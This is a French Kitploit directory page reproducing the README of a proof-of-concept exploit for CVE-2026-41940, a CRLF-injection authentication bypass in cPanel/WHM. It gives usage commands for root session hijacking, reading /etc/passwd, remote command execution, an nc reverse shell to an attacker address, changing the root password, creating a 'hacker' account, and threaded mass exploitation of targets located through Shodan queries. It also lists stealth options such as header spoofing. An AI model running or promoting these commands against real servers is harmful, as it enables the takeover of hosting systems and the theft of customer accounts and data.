Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 Exploit de contournement d'authentification cPanel/WHM - Meilleur flux 💥 L'injection CRLF mène à un contournement d'authentification, un détournement de session et une fuite de compte. ✅ Proxy, UA personnalisé, keep-alive, tentatives, vérification SSL, sortie colorée, support de sauvegarde de fichier. ⚡ PoC avancé pour pentesteurs. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Red Teaming
Développement de Charges Utiles
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

Voir le dépôt
928il y a 1 moisPas encore vérifié

À propos

🚀 CVE-2026-41940 Exploit de contournement d'authentification cPanel/WHM - Meilleur flux 💥 L'injection CRLF mène à un contournement d'authentification, un détournement de session et une fuite de compte. ✅ Proxy, UA personnalisé, keep-alive, tentatives, vérification SSL, sortie colorée, support de sauvegarde de fichier. ⚡ PoC avancé pour pentesteurs.

Partager

CVE-2026-41940

🚀 CVE-2026-41940 - Exploitation de contournement d'authentification cPanel/WHM

Python License CVSS Pentesting

Édition cPanel & WHM - Injection CRLF pour contournement d'authentification et détournement complet de session

📌 Aperçu

Cet exploit exploite CVE-2026-41940, une vulnérabilité critique de contournement d'authentification dans cPanel/WHM. En injectant une charge utile CRLF conçue dans le système de gestion de session, il parvient au détournement de session, à l'accès root et au contrôle complet du panneau d'hébergement sans aucun identifiant valide.

🔥 Fonctionnalités clés

CatégorieFonctionnalités
Exploitation✅ Contournement d'authentification par injection CRLF
✅ Détournement de session WHM
✅ Fuite de jeton de sécurité
✅ Accès root instantané
Post-exploitation✅ Extraction de liste de comptes (Utilisateur + Domaine)
✅ Exécution de commandes à distance (RCE)
✅ Shell inverse (compatible netcat)
✅ Lecture de fichiers (configs, logs, etc.)
✅ Changement du mot de passe root
✅ Création d'un nouvel utilisateur cPanel
Scan✅ Exploitation d'une cible unique
✅ Scan de masse multi-cibles
✅ Multi-threading (threads configurables)
✅ Support de remplacement de port
Discrétion✅ Délais aléatoires entre les requêtes
✅ Usurpation X-Forwarded-For
✅ Support d'agent utilisateur personnalisé
✅ Support proxy (HTTP/HTTPS)
Utilisabilité✅ Shell WHM interactif (-i)
✅ Sortie colorée (colorama)
✅ Mode verbeux/débogage
✅ Export de la liste de comptes vers un fichier
✅ Thread de session Keep-Alive
✅ Mécanisme de réessai pour connexions instables

🎯 Versions vulnérables

ProduitVersionsStatut
cPanel & WHM11.92 - 11.102✅ Confirmé
cPanel & WHM11.104 - 11.110✅ Confirmé
cPanel & WHM11.118 - 11.136⚠️ Limité
cPanel & WHM< 11.86✅ Potentiellement vulnérable

📍 Recherche Shodan

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Avertissement : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins pédagogiques. Tout accès non autorisé est illégal.

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Exemples d'utilisation

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Commandes du shell interactif

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 Exécution de commandes à distance

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Shell inverse

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Opérations post-exploitation

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Exploitation de masse (multi-cibles)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Options avancées

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Arguments de ligne de commande

CourtLongDescriptionPar défaut
-t--targetURL cible uniqueRequis (unique)
-l--target-fileFichier contenant la liste des ciblesRequis (masse)
-p--portForcer le portDétection automatique
-o--outputEnregistrer la liste des comptes dans un fichierAucun
-v--verboseActiver la sortie de débogageFaux
-i--interactiveShell WHM interactifFaux
--proxyProxy HTTP/HTTPSAucun
-ua--user-agentAgent utilisateur personnaliséAléatoire
--cmdExécuter une commande uniqueAucun
--reverse-shellIP:PORT du shell inverseAucun
--passwdChanger le mot de passe rootAucun
--adduserCréer un nouvel utilisateur (UTILISATEUR DOMAINE MOTDEPASSE)Aucun
--readLire un fichier depuis la cibleAucun
--threadsThreads pour le scan de masse10
--delayIntervalle keep-alive (secondes)3.0
--max-retriesNombre maximal de tentatives par requête3
--no-keep-aliveNe pas maintenir la sessionFaux

🧪 Environnement de test

Docker (si vous voulez tester en toute sécurité)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

Ou avec une version vulnérable

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Exploits connexes

Découvrez mes autres dépôts d'exploits :

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Télécharger l’outil
--ssl-verifyVérifier les certificats SSLFaux